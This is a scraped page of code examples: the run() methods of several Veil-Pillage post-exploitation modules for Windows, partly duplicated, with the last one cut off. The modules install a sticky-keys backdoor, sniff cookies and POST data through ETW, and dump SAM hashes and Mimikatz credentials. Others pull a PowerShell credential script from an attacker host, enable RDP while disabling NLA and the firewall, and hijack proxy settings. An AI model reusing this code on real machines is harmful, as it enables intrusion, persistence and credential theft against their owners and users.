            command = "reg query HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System /v EnableLUA"
            result = command_methods.executeResult(target, username, password,
                                                   command, triggerMethod)

            if result == "":
                self.output += "[!] No result file, check UAC failed using creds '" + username + ":" + password + "' on : " + target + "\n"
            elif "0x1" in result:
                self.output += "[*] UAC enabled using creds '" + username + ":" + password + "' on : " + target + "\n"
            elif "0x0" in result:
                self.output += "[*] UAC disabled using creds '" + username + ":" + password + "' on : " + target + "\n"
            else:
                self.output += "[!] Error in checking UAC using creds '" + username + ":" + password + "' on : " + target + "\n"
Exemple #32
0
    def run(self):

        # assume single set of credentials
        username, password = self.creds[0]

        triggerMethod = self.required_options["trigger_method"][0]

        for target in self.targets:

            # command to start Event Tracing for Windows on the target for WinInit (IE)
            cmd = "logman start Status32 -p Microsoft-Windows-WinInet -o C:\\Windows\\Temp\\status32.etl -ets"

            etwResult = command_methods.executeResult(target, username,
                                                      password, cmd,
                                                      triggerMethod)

            if etwResult == "":
                self.output += "[!] ETW unsuccessfully started using creds '" + username + ":" + password + "' on  : " + target + ", no result file\n"
            elif "The command completed successfully." in etwResult:
                self.output += "[*] ETW started using creds '" + username + ":" + password + "' on  " + target + "\n"
            else:
                self.output += "[!] ETW unsuccessfully started using creds '" + username + ":" + password + "' on  : " + target + "\n"
Exemple #33
0
    def run(self):

        # assume single set of credentials
        username, password = self.creds[0]

        triggerMethod = self.required_options["trigger_method"][0]
        flag = self.required_options["flag"][0]

        for target in self.targets:

            # stop the ETW
            stopCMD = "logman stop Status32 -ets"
            command_methods.executeCommand(target, username, password, stopCMD, triggerMethod)

            # search for cookies or POST paramters
            if flag.lower() == "post":
                flag = "POST"
                moduleFile = "post_params.txt"
            else:
                flag = "cookie added"
                moduleFile = "cookies.txt"

            # check the ETW results for the specified flag, and delete the dump file
            parseCmd = "wevtutil qe C:\\Windows\\Temp\\status32.etl /lf:true /f:Text | find /i \""+flag+"\""
            
            # wait 20 seconds for everything to parse...if errors happen, increase this
            parseResult = command_methods.executeResult(target, username, password, parseCmd, triggerMethod, pause=20)

            # delete the trace file
            delCmd = "del C:\\Windows\\Temp\\status32.etl"
            command_methods.executeCommand(target, username, password, delCmd, triggerMethod)

            if parseResult == "":
                self.output += "[!] No ETW results for "+flag+" using creds '"+username+":"+password+"' on : " + target + "\n"
            else:
                # save the file off to the appropriate location
                saveFile = helpers.saveModuleFile(self, target, moduleFile, parseResult)
                self.output += "[*] ETW results for "+flag+" using creds '"+username+":"+password+"' on " + target + " stored at "+saveFile+"\n"
    def run(self):

        # assume single set of credentials
        username, password = self.creds[0]

        triggerMethod = self.required_options["trigger_method"][0]

        # command to invoke finddllhijack and output it to a temporary file
        exePath = settings.VEIL_PILLAGE_PATH + "/data/misc/finddllhijack.exe"
        cmd = "C:\\Windows\\Temp\\finddllhijack.exe"

        for target in self.targets:

            # upload the binary to the host at C:\Windows\Temp\
            smb.uploadFile(target, username, password, "C$",
                           "\\Windows\\Temp\\", exePath)

            # execute finddllhijack and get the results
            out = command_methods.executeResult(target,
                                                username,
                                                password,
                                                cmd,
                                                triggerMethod,
                                                pause=5)

            # cleanup
            command_methods.executeCommand(
                target, username, password,
                "del C:\\Windows\\Temp\\finddllhijack.exe", triggerMethod)

            # save the file off to the appropriate location
            saveFile = helpers.saveModuleFile(self, target,
                                              "finddllhijack.txt", out)

            if out != "":
                self.output += "[*] FindDllHijack results for " + target + " stored at " + saveFile + "\n"
            else:
                self.output += "[!] FindDllHijack failed for " + target + " : no result file\n"
    def run(self):

        # assume single set of credentials
        username, password = self.creds[0]

        triggerMethod = self.required_options["trigger_method"][0]

        # kill all powershell processes
        killCMD = "taskkill /f /im powershell.exe"

        for target in self.targets:

            # execute the command on the host and get the output
            out = command_methods.executeResult(target,
                                                username,
                                                password,
                                                killCMD,
                                                triggerMethod=triggerMethod)

            if "SUCCESS" in out:
                self.output += "[*] Powershell processes terminated using creds '" + username + ":" + password + "' on " + target + "\n"
            else:
                self.output += "[*] Powershell processes failed to terminate using creds '" + username + ":" + password + "' on " + target + "\n"
Exemple #36
0
    def run(self):

        # assume single set of credentials for this module
        username, password = self.creds[0]

        for target in self.targets:

            print " [*] Doing soemthing on %s" % (target)
            command = "something to do on the host"

            # ...
            result = command_methods.executeResult(
                target, username, password, command,
                self.required_options["trigger_method"][0])

            # check our output and write output/cleanup as appropriate
            if "something" in result:
                self.output += "action successful on " + target + "\n"
                # this needs to be tab-separated, check a module for examples
                self.cleanup += "cleanup command " + target + "\n"

        # finally return our putput and cleanup text
        return (self.output, self.cleanup)
Exemple #37
0
    def run(self):

        # assume single set of credentials (take the first one)
        username, password = self.creds[0]

        triggerMethod = self.required_options["trigger_method"][0]

        for target in self.targets:

            # the registry command to set up the sethc stickkeys backdoor
            sethcCommand = "REG ADD \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\sethc.exe\" /f /v Debugger /t REG_SZ /d \"C:\\Windows\\System32\\cmd.exe\""

            # execute the sethc command and get the result
            sethcResult = command_methods.executeResult(target, username, password, sethcCommand, triggerMethod)

            if sethcResult == "":
                self.output += "[!] No result file, SETHC backdoor enable failed using creds '"+username+":"+password+"' on : " + target + "\n"
            elif "The operation completed successfully" in sethcResult:
                self.output += "[*] SETHC backdoor successfully enabled using creds '"+username+":"+password+"' on : " + target + "\n"

                # build our cleanup -> deleting this registry run value
                cleanupCMD = "REG DELETE \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\sethc.exe\" /v Debugger /f"
                self.cleanup += "executeCommand|"+target+"|"+username+"|"+password+"|"+cleanupCMD+"|"+triggerMethod+"\n"
Exemple #38
0
    def run(self):

        # assume single set of credentials (take the first one)
        username, password = self.creds[0]

        triggerMethod = self.required_options["trigger_method"][0]

        for target in self.targets:

            # the registry command to set up the sethc stickkeys backdoor
            sethcCommand = "REG ADD \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\sethc.exe\" /f /v Debugger /t REG_SZ /d \"C:\\Windows\\System32\\cmd.exe\""

            # execute the sethc command and get the result
            sethcResult = command_methods.executeResult(
                target, username, password, sethcCommand, triggerMethod)

            if sethcResult == "":
                self.output += "[!] No result file, SETHC backdoor enable failed using creds '" + username + ":" + password + "' on : " + target + "\n"
            elif "The operation completed successfully" in sethcResult:
                self.output += "[*] SETHC backdoor successfully enabled using creds '" + username + ":" + password + "' on : " + target + "\n"

                # build our cleanup -> deleting this registry run value
                cleanupCMD = "REG DELETE \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\sethc.exe\" /v Debugger /f"
                self.cleanup += "executeCommand|" + target + "|" + username + "|" + password + "|" + cleanupCMD + "|" + triggerMethod + "\n"
    def run(self):

        # assume single set of credentials
        username, password = self.creds[0]

        triggerMethod = self.required_options["trigger_method"][0]

        for target in self.targets:
            
            # reg.exe command to detect if powershell is installed
            command = "reg query HKLM\\SOFTWARE\\Microsoft\\PowerShell\\1 /v Install"
            result = command_methods.executeResult(target, username, password, command, triggerMethod)

            if result.startswith("error:"):
                self.output += "[!] Error '"+result+"' in detecting powershell using creds '"+username+":"+password+"' on : " + target + "\n" 
            elif result == "":
                self.output += "[!] No result file, detect PowerShell failed using creds '"+username+":"+password+"' on : " + target + "\n"
            elif "0x1" in result:
                self.output += "[*] PowerShell detected using creds '"+username+":"+password+"' on : " + target + "\n"
            elif "0x0" in result:
                self.output += "[*] PowerShell not detected using creds '"+username+":"+password+"' on : " + target + "\n"
            else:
                print "result:",result
                self.output += "[!] Error in detecting PowerShell using creds '"+username+":"+password+"' on : " + target + "\n"
    def run(self):

        # assume single set of credentials
        username, password = self.creds[0]

        triggerMethod = self.required_options["trigger_method"][0]
        uploadName = self.required_options["upload_name"][0]


        # if we're using Veil-Evasion for payload generation
        if self.required_options["exe_path"][0].lower() == "veil":

            # create a Veil-Evasion controller object for payload generation
            con = controller.Controller()

            # check various possibly flags passed by the command line

            # if we don't have payload specified, jump to the main controller menu
            if not self.args.p:
                payloadPath = con.MainMenu()
            # otherwise, set all the appropriate payload options
            else:
                # pull out any required options from the command line and
                # build the proper dictionary so we can set the payload manually
                options = {}
                if self.args.c:
                    options['required_options'] = {}
                    for option in self.args.c:
                        name,value = option.split("=")
                        options['required_options'][name] = [value, ""]

                # pull out any msfvenom shellcode specification and msfvenom options
                if self.args.msfpayload:
                    options['msfvenom'] = [self.args.msfpayload, self.args.msfoptions]

                # manually set the payload in the controller object
                con.SetPayload(self.args.p, options)

                # generate the payload code
                code = con.GeneratePayload()

                # grab the generated payload .exe name
                payloadPath = con.OutputMenu(con.payload, code, showTitle=True, interactive=False)


            # nicely print the title and module name again (since Veil-Evasion trashes this)
            messages.title()
            print " [*] Executing module: " + helpers.color(self.name) + "..."

            # sanity check if the user exited Veil-Evasion execution
            if not payloadPath or payloadPath == "":
                print helpers.color(" [!] No output from Veil-Evasion", warning=True)
                raw_input("\n [>] Press enter to continue: ")
                return ""

        # if we have a custom-specified .exe, use that instead
        else:
            payloadPath = self.required_options["exe_path"][0]

            # if the .exe path doesn't exist, print and error and return
            if not os.path.exists(payloadPath):
                print helpers.color("\n\n [!] Invalid .exe path specified", warning=True)
                raw_input("\n [>] Press enter to continue: ")
                return ""


        # make sure the name ends with ".exe"
        if not uploadName.endswith(".exe"):
            uploadName += ".exe"

        # copy the resulting binary into the temporary directory with the appropriate name
        os.system("cp "+payloadPath+" /tmp/"+uploadName)

        for target in self.targets:

            baseName = payloadPath.split("/")[-1]

            # upload the payload to C:\Windows\System32\
            smb.uploadFile(target, username, password, "C$", "\\Windows\\","/tmp/"+uploadName)            
            self.output += "[*] Binary '"+baseName+"' uploaded to C:\\Windows\\"+uploadName+" using creds '"+username+":"+password+"' on : " + target + "\n"

            # the registry command to set up the sethc stickkeys backdoor for the binary
            sethcCommand = "REG ADD \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\sethc.exe\" /f /v Debugger /t REG_SZ /d \"C:\\Windows\\"+uploadName+"\""

            # execute the sethc command and get the result
            sethcResult = command_methods.executeResult(target, username, password, sethcCommand, triggerMethod)

            if sethcResult == "":
                self.output += "[!] No result file, SETHC backdoor enable failed using creds '"+username+":"+password+"' on : " + target + "\n"
            elif "The operation completed successfully" in sethcResult:
                self.output += "[*] SETHC backdoor successfully enabled using creds '"+username+":"+password+"' on : " + target + "\n"

                # build our cleanup -> deleting this registry run value
                cleanupCMD = "REG DELETE \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\sethc.exe\" /v Debugger /f"
                self.cleanup += "executeCommand|"+target+"|"+username+"|"+password+"|"+cleanupCMD+"|"+triggerMethod+"\n"
Exemple #41
0
    def run(self):

        # assume single set of credentials for this module
        username, password = self.creds[0]

        lhost = self.required_options["lhost"][0]
        use_ssl = self.required_options["use_ssl"][0]
        force_method = self.required_options["force_method"][0]
        delay = self.required_options["delay"][0]
        out_file = self.required_options["out_file"][0]

        # let's keep track of all credentials found
        allhashes, allmsv, allkerberos, allwdigest, alltspkg = [], [], [], [], []

        for target in self.targets:

            powershellInstalled = False

            # check if we're forcing a particular grab method
            if force_method.lower() == "binary":
                powershellInstalled = False
            elif force_method.lower() == "powershell":
                powershellInstalled = True
            else:
                # check if we have a functional Powershell installation
                powershellCommand = 'powershell.exe -c "$a=42;$a"'
                powershellResult = command_methods.executeResult(target, username, password, powershellCommand, "wmis")
                if powershellResult.strip() == "42":
                    powershellInstalled = True

            if powershellInstalled:

                # do powersploit combined file of invoke-mimikatz and powerdump
                print helpers.color("\n [*] Powershell installed on " + target)
                self.output += "[*] Powershell installed on " + target + ", using autograb.ps1\n"

                # the temporary output file we will write to
                if "\\" not in out_file:
                    # otherwise assume it's an absolute path
                    out_file = "C:\\Windows\\Temp\\" + out_file

                # path to the combined Invoke-Mimikatz/powerdump powershell script
                secondStagePath = settings.VEIL_PILLAGE_PATH + "/data/misc/autograb.ps1"

                # trigger the powershell download on just this target
                delivery_methods.powershellHostTrigger(
                    target,
                    username,
                    password,
                    secondStagePath,
                    lhost,
                    "",
                    triggerMethod="winexe",
                    outFile=out_file,
                    ssl=use_ssl,
                    noArch=True,
                )

                print "\n [*] Waiting " + delay + "s for Autograb to run..."
                time.sleep(int(delay))

                # grab the output file and delete it
                out = smb.getFile(target, username, password, out_file, delete=True)

                # save the file off to the appropriate location
                saveFile = helpers.saveModuleFile(self, target, "autograb.txt", out)

                # parse the mimikatz output and append it to our globals
                (msv1_0, kerberos, wdigest, tspkg) = helpers.parseMimikatz(out)
                allmsv.extend(msv1_0)
                allkerberos.extend(kerberos)
                allwdigest.extend(wdigest)
                alltspkg.extend(tspkg)

                # parse the powerdump component
                hashes = helpers.parseHashdump(out)
                allhashes.extend(hashes)

                if out != "":
                    self.output += (
                        "[*] Autograb.ps1 results using creds '"
                        + username
                        + ":"
                        + password
                        + "' on "
                        + target
                        + " stored at "
                        + saveFile
                        + "\n"
                    )
                else:
                    self.output += (
                        "[!] Autograb.ps1 failed using creds '"
                        + username
                        + ":"
                        + password
                        + "' on "
                        + target
                        + " : no result file\n"
                    )

            else:
                # do reg.exe for hashdump and host/execute for mimikatz
                print helpers.color("\n [!] Powershell not installed on " + target, warning=True)
                print helpers.color("\n [*] Using reg.exe save method for hash dumping on " + target)
                self.output += "[!] Powershell not installed on " + target + "\n"

                # reg.exe command to save off the hives
                regSaveCommand = "reg save HKLM\\SYSTEM C:\\Windows\\Temp\\system /y && reg save HKLM\\SECURITY C:\\Windows\\Temp\\security /y && reg save HKLM\\SAM C:\\Windows\\Temp\\sam /y"

                # execute the registry save command
                command_methods.executeCommand(target, username, password, regSaveCommand, "wmis")

                print helpers.color("\n [*] Dumping hashes on " + target)

                # sleep for 5 seconds to let everything backup
                time.sleep(5)

                # grab all of the backed up files
                systemFile = smb.getFile(target, username, password, "C:\\Windows\\Temp\\system", delete=False)
                securityFile = smb.getFile(target, username, password, "C:\\Windows\\Temp\\security", delete=False)
                samFile = smb.getFile(target, username, password, "C:\\Windows\\Temp\\sam", delete=False)

                # more error-checking here?
                if systemFile == "":
                    self.output += "[!] File '" + systemFile + "' from " + target + " empty or doesn't exist\n"
                else:
                    f = open("/tmp/system", "w")
                    f.write(systemFile)
                    f.close()

                if securityFile == "":
                    self.output += "[!] File '" + securityFile + "' from " + target + " empty or doesn't exist\n"
                else:
                    f = open("/tmp/security", "w")
                    f.write(securityFile)
                    f.close()

                if samFile == "":
                    self.output += "[!] File '" + samFile + "' from " + target + " empty or doesn't exist\n"
                else:
                    f = open("/tmp/sam", "w")
                    f.write(samFile)
                    f.close()

                # get all the hashes from these hives
                out = creddump.dump_file_hashes("/tmp/system", "/tmp/sam")

                # save the output file off
                saveLocation = helpers.saveModuleFile(self, target, "creddump.txt", out)
                self.output += (
                    "[*] dumped hashes (reg.exe) using creds '"
                    + username
                    + ":"
                    + password
                    + "' on "
                    + target
                    + " saved to "
                    + saveLocation
                    + "\n"
                )

                # save these off to the universal list
                hashes = helpers.parseHashdump(out)
                allhashes.extend(hashes)

                # now, detect the architecture
                archCommand = "echo %PROCESSOR_ARCHITECTURE%"
                archResult = command_methods.executeResult(target, username, password, archCommand, "wmis")
                arch = "x86"
                if "64" in archResult:
                    arch = "x64"

                # now time for ze mimikatz!
                mimikatzPath = settings.VEIL_PILLAGE_PATH + "/data/misc/mimikatz" + arch + ".exe"

                # the temporary output file we will write to
                if "\\" not in out_file:
                    # otherwise assume it's an absolute path
                    out_file = "C:\\Windows\\Temp\\" + out_file

                exeArgs = '"sekurlsa::logonPasswords full" "exit" >' + out_file

                # host mimikatz.exe and trigger it ONLY on this particular machine
                # so we can get the architecture correct
                delivery_methods.hostTrigger(
                    target, username, password, mimikatzPath, lhost, triggerMethod="wmis", exeArgs=exeArgs
                )

                print "\n [*] Waiting " + delay + "s for Mimikatz to run..."
                time.sleep(int(delay))

                # grab the output file and delete it
                out = smb.getFile(target, username, password, out_file, delete=True)

                # parse the mimikatz output and append it to our globals
                (msv1_0, kerberos, wdigest, tspkg) = helpers.parseMimikatz(out)

                allmsv.extend(msv1_0)
                allkerberos.extend(kerberos)
                allwdigest.extend(wdigest)
                alltspkg.extend(tspkg)

                # save the file off to the appropriate location
                saveFile = helpers.saveModuleFile(self, target, "mimikatz.txt", out)

                if out != "":
                    self.output += (
                        "[*] Mimikatz results using creds '"
                        + username
                        + ":"
                        + password
                        + "' on "
                        + target
                        + " stored at "
                        + saveFile
                        + "\n"
                    )
                else:
                    self.output += (
                        "[!] Mimikatz failed using creds '"
                        + username
                        + ":"
                        + password
                        + "' on "
                        + target
                        + " : no result file\n"
                    )

        if len(allhashes) > 0:
            allhashes = sorted(set(allhashes))
            self.output += "[*] All unique hashes:\n\t" + "\n\t".join(allhashes) + "\n"
        if len(allmsv) > 0:
            allmsv = sorted(set(allmsv))
            self.output += "[*] All msv1_0:\n\t" + "\n\t".join(allmsv) + "\n"
        if len(allkerberos) > 0:
            allkerberos = sorted(set(allkerberos))
            self.output += "[*] All kerberos:\n\t" + "\n\t".join(allkerberos) + "\n"
        if len(allwdigest) > 0:
            allwdigest = sorted(set(allwdigest))
            self.output += "[*] All wdigest:\n\t" + "\n\t".join(allwdigest) + "\n"
        if len(alltspkg) > 0:
            alltspkg = sorted(set(alltspkg))
            self.output += "[*] All tspkg:\n\t" + "\n\t".join(alltspkg) + "\n"
    def run(self):

        # assume single set of credentials (take the first one)
        username, password = self.creds[0]

        triggerMethod = self.required_options["trigger_method"][0]

        # enable RDP command
        rdpCMD = 'reg add "HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f'

        # cleanup RDP command
        rdpCleanupCMD = 'reg add "HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 1 /f'

        # Disable NLA command
        nlaCMD = 'reg add "HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp" /v UserAuthentication /t REG_DWORD /d 0 /f'

        # Firewall exception command
        firewallCMD = "netsh firewall set service type = remotedesktop mod = enable"

        for target in self.targets:

            # execute the RDP enable command and get the result
            rdpResult = command_methods.executeResult(target, username, password, rdpCMD, triggerMethod)

            if rdpResult == "":
                self.output += (
                    "[!] No result file, RDP enable failed using creds '"
                    + username
                    + ":"
                    + password
                    + "' on : "
                    + target
                    + "\n"
                )
            elif "The operation completed successfully" in rdpResult:

                self.output += (
                    "[*] RDP successfully enabled using creds '" + username + ":" + password + "' on : " + target + "\n"
                )
                # our cleanup is to execute the RDP disable command
                self.cleanup += (
                    "executeCommand|"
                    + target
                    + "|"
                    + username
                    + "|"
                    + password
                    + "|"
                    + rdpCleanupCMD
                    + "|"
                    + triggerMethod
                    + "\n"
                )

                # if we succeed here, keep going...

                # execute the disable NLA command
                nlaResult = command_methods.executeResult(target, username, password, nlaCMD, triggerMethod)
                if nlaResult == "":
                    self.output += (
                        "[!] No result file, NLA disable failed using creds '"
                        + username
                        + ":"
                        + password
                        + "' on : "
                        + target
                        + "\n"
                    )
                elif "The operation completed successfully" in nlaResult:
                    self.output += (
                        "[*] NLA successfully disabled using creds '"
                        + username
                        + ":"
                        + password
                        + "' on : "
                        + target
                        + "\n"
                    )

                    # more success, keep going again...

                    # execute the firewall exception command
                    firewallResult = command_methods.executeResult(
                        target, username, password, firewallCMD, triggerMethod
                    )

                    if firewallResult == "":
                        self.output += (
                            "[!] No result file, firewall exeception failed using creds '"
                            + username
                            + ":"
                            + password
                            + "' on : "
                            + target
                            + "\n"
                        )
                    elif "executed successfully" in firewallResult:
                        self.output += (
                            "[*] Firewall exception successfully enabled using creds '"
                            + username
                            + ":"
                            + password
                            + "' on : "
                            + target
                            + "\n"
                        )
                    else:
                        self.output += (
                            "[!] Error in enabling firewall exception using creds '"
                            + username
                            + ":"
                            + password
                            + "' on : "
                            + target
                            + "\n"
                        )

                else:
                    self.output += (
                        "[!] Error in disabling NLA using creds '"
                        + username
                        + ":"
                        + password
                        + "' on : "
                        + target
                        + "\n"
                    )

            else:
                self.output += (
                    "[!] Error in enabling RDP using creds '" + username + ":" + password + "' on : " + target + "\n"
                )
    def run(self):

        # assume single set of credentials for this module
        username, password = self.creds[0]

        triggerMethod = self.required_options['trigger_method'][0]
        proxyUrl = self.required_options['proxy_url'][0]

        proxyCheckCmd = "reg query \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\" /v ProxyEnable"

        proxyCheckServerCmd = "reg query \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\" /v ProxyServer"

        proxyEnableCmd = "reg add \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\" /v ProxyEnable /t REG_DWORD /d 1 /f"

        proxySetCmd = "reg add \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\" /v ProxyServer /t REG_SZ /d %s /f" % (
            proxyUrl)
        proxy = ""

        for target in self.targets:

            self.output += "[*] Checking proxy settings on %s" % (target)

            results = command_methods.executeResult(target, username, password,
                                                    proxyCheckCmd,
                                                    triggerMethod)

            if results == "":
                self.output += "\n[!] No result file, Proxy enable failed using creds '" + username + ":" + password + "' on : " + target + "\n"
            elif "ProxyEnable" not in results:
                self.output += "\n[*] Proxy has never been set on " + target

                self.output += "\n[*] Enabling system proxy"

                enable_results = command_methods.executeResult(
                    target, username, password, proxyEnableCmd, triggerMethod)

                if "The operation completed successfully" in enable_results:
                    self.output += "\n[*] Proxy successfully enabled on " + target

                    self.output += "\n[*] Setting proxy server"

                    set_results = command_methods.executeResult(
                        target, username, password, proxySetCmd, triggerMethod)

                    if "The operation completed successfully" in set_results:
                        self.output += "\n[*] Proxy address successfully set to %s on %s" % (
                            proxyUrl, target)

                        cleanupCMD = "reg delete \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\" /v ProxyEnable /f && reg delete \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\" /v ProxyServer /f"
                        self.cleanup += "executeCommand|" + target + "|" + username + "|" + password + "|" + cleanupCMD + "|" + triggerMethod + "\n"

            elif "0x0" in results:
                server_results = command_methods.executeResult(
                    target, username, password, proxyCheckServerCmd,
                    triggerMethod)
                proxy = ""

                for res in server_results.split(" "):
                    r = re.findall(r".+:[0-9]{1,5}", res)
                    if r:
                        proxy = r[0]

                if proxy == "":
                    self.output += "\n[*] Proxy has been disabled on %s" % (
                        target)
                else:
                    self.output += "\n[*] Proxy has been disabled but set to %s on %s" % (
                        proxy, target)

                self.output += "\n[*] Enabling proxy"

                enable_results = command_methods.executeResult(
                    target, username, password, proxyEnableCmd, triggerMethod)

                if "The operation completed successfully" in enable_results:
                    self.output += "\n[*] Proxy successfully enabled on " + target

                    self.output += "\n[*] Setting proxy server"

                    set_results = command_methods.executeResult(
                        target, username, password, proxySetCmd, triggerMethod)

                    if "The operation completed successfully" in set_results:
                        self.output += "\n[*] Proxy address successfully set to %s on %s" % (
                            proxyUrl, target)

                        cleanupCMD = "reg add \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\" /v ProxyEnable /t REG_DWORD /d 0 /f && reg add \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\" /v ProxyServer /t REG_SZ /d \"%s\" /f" % proxy
                        self.cleanup += "executeCommand|" + target + "|" + username + "|" + password + "|" + cleanupCMD + "|" + triggerMethod + "\n"

            elif "0x1" in results:
                server_results = command_methods.executeResult(
                    target, username, password, proxyCheckServerCmd,
                    triggerMethod)
                proxy = ""

                for res in server_results.split(" "):
                    r = re.findall(r".+:[0-9]{1,5}", res)
                    if r:
                        proxy = r[0]

                if proxy == "":
                    self.output += "\n[*] Proxy already enabled on %s" % (
                        target)
                else:
                    self.output += "\n[*] Proxy already enabled and set to %s on %s" % (
                        proxy, target)

                self.output += "\n[*] Setting proxy server on " + target

                set_results = command_methods.executeResult(
                    target, username, password, proxySetCmd, triggerMethod)

                if "The operation completed successfully" in set_results:
                    self.output += "\n[*] Proxy address successfully set to %s on %s" % (
                        proxyUrl, target)

                    cleanupCMD = "reg add \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\" /v ProxyServer /t REG_SZ /d \"%s\" /f" % proxy
                    self.cleanup += "executeCommand|" + target + "|" + username + "|" + password + "|" + cleanupCMD + "|" + triggerMethod + "\n"

            else:
                self.output += "\n[!] Got unexpected output: %s" % results
    def run(self):

        # assume single set of credentials for this module
        username, password = self.creds[0]

        triggerMethod = self.required_options["trigger_method"][0]
        proxyUrl = self.required_options["proxy_url"][0]

        proxyCheckCmd = (
            'reg query "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings" /v ProxyEnable'
        )

        proxyCheckServerCmd = (
            'reg query "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings" /v ProxyServer'
        )

        proxyEnableCmd = 'reg add "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings" /v ProxyEnable /t REG_DWORD /d 1 /f'

        proxySetCmd = (
            'reg add "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings" /v ProxyServer /t REG_SZ /d %s /f'
            % (proxyUrl)
        )
        proxy = ""

        for target in self.targets:

            self.output += "[*] Checking proxy settings on %s" % (target)

            results = command_methods.executeResult(target, username, password, proxyCheckCmd, triggerMethod)

            if results == "":
                self.output += (
                    "\n[!] No result file, Proxy enable failed using creds '"
                    + username
                    + ":"
                    + password
                    + "' on : "
                    + target
                    + "\n"
                )
            elif "ProxyEnable" not in results:
                self.output += "\n[*] Proxy has never been set on " + target

                self.output += "\n[*] Enabling system proxy"

                enable_results = command_methods.executeResult(
                    target, username, password, proxyEnableCmd, triggerMethod
                )

                if "The operation completed successfully" in enable_results:
                    self.output += "\n[*] Proxy successfully enabled on " + target

                    self.output += "\n[*] Setting proxy server"

                    set_results = command_methods.executeResult(target, username, password, proxySetCmd, triggerMethod)

                    if "The operation completed successfully" in set_results:
                        self.output += "\n[*] Proxy address successfully set to %s on %s" % (proxyUrl, target)

                        cleanupCMD = 'reg delete "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings" /v ProxyEnable /f && reg delete "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings" /v ProxyServer /f'
                        self.cleanup += (
                            "executeCommand|"
                            + target
                            + "|"
                            + username
                            + "|"
                            + password
                            + "|"
                            + cleanupCMD
                            + "|"
                            + triggerMethod
                            + "\n"
                        )

            elif "0x0" in results:
                server_results = command_methods.executeResult(
                    target, username, password, proxyCheckServerCmd, triggerMethod
                )
                proxy = ""

                for res in server_results.split(" "):
                    r = re.findall(r".+:[0-9]{1,5}", res)
                    if r:
                        proxy = r[0]

                if proxy == "":
                    self.output += "\n[*] Proxy has been disabled on %s" % (target)
                else:
                    self.output += "\n[*] Proxy has been disabled but set to %s on %s" % (proxy, target)

                self.output += "\n[*] Enabling proxy"

                enable_results = command_methods.executeResult(
                    target, username, password, proxyEnableCmd, triggerMethod
                )

                if "The operation completed successfully" in enable_results:
                    self.output += "\n[*] Proxy successfully enabled on " + target

                    self.output += "\n[*] Setting proxy server"

                    set_results = command_methods.executeResult(target, username, password, proxySetCmd, triggerMethod)

                    if "The operation completed successfully" in set_results:
                        self.output += "\n[*] Proxy address successfully set to %s on %s" % (proxyUrl, target)

                        cleanupCMD = (
                            'reg add "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings" /v ProxyEnable /t REG_DWORD /d 0 /f && reg add "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings" /v ProxyServer /t REG_SZ /d "%s" /f'
                            % proxy
                        )
                        self.cleanup += (
                            "executeCommand|"
                            + target
                            + "|"
                            + username
                            + "|"
                            + password
                            + "|"
                            + cleanupCMD
                            + "|"
                            + triggerMethod
                            + "\n"
                        )

            elif "0x1" in results:
                server_results = command_methods.executeResult(
                    target, username, password, proxyCheckServerCmd, triggerMethod
                )
                proxy = ""

                for res in server_results.split(" "):
                    r = re.findall(r".+:[0-9]{1,5}", res)
                    if r:
                        proxy = r[0]

                if proxy == "":
                    self.output += "\n[*] Proxy already enabled on %s" % (target)
                else:
                    self.output += "\n[*] Proxy already enabled and set to %s on %s" % (proxy, target)

                self.output += "\n[*] Setting proxy server on " + target

                set_results = command_methods.executeResult(target, username, password, proxySetCmd, triggerMethod)

                if "The operation completed successfully" in set_results:
                    self.output += "\n[*] Proxy address successfully set to %s on %s" % (proxyUrl, target)

                    cleanupCMD = (
                        'reg add "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings" /v ProxyServer /t REG_SZ /d "%s" /f'
                        % proxy
                    )
                    self.cleanup += (
                        "executeCommand|"
                        + target
                        + "|"
                        + username
                        + "|"
                        + password
                        + "|"
                        + cleanupCMD
                        + "|"
                        + triggerMethod
                        + "\n"
                    )

            else:
                self.output += "\n[!] Got unexpected output: %s" % results
Exemple #45
0
    def run(self):

        # assume single set of credentials for this module
        username, password = self.creds[0]

        triggerMethod = self.required_options["trigger_method"][0]
        lhost = self.required_options["lhost"][0]
        delay = self.required_options["delay"][0]
        out_file = self.required_options["out_file"][0]

        # the temporary output file gpp-password will write to
        if "\\" not in out_file:
            # otherwise assume it's an absolute path
            out_file = "C:\\Windows\\Temp\\" + out_file

        # let's keep track of ALL plaintext credentials found
        allmsv, allkerberos, allwdigest, alltspkg = [], [], [], []

        for target in self.targets:

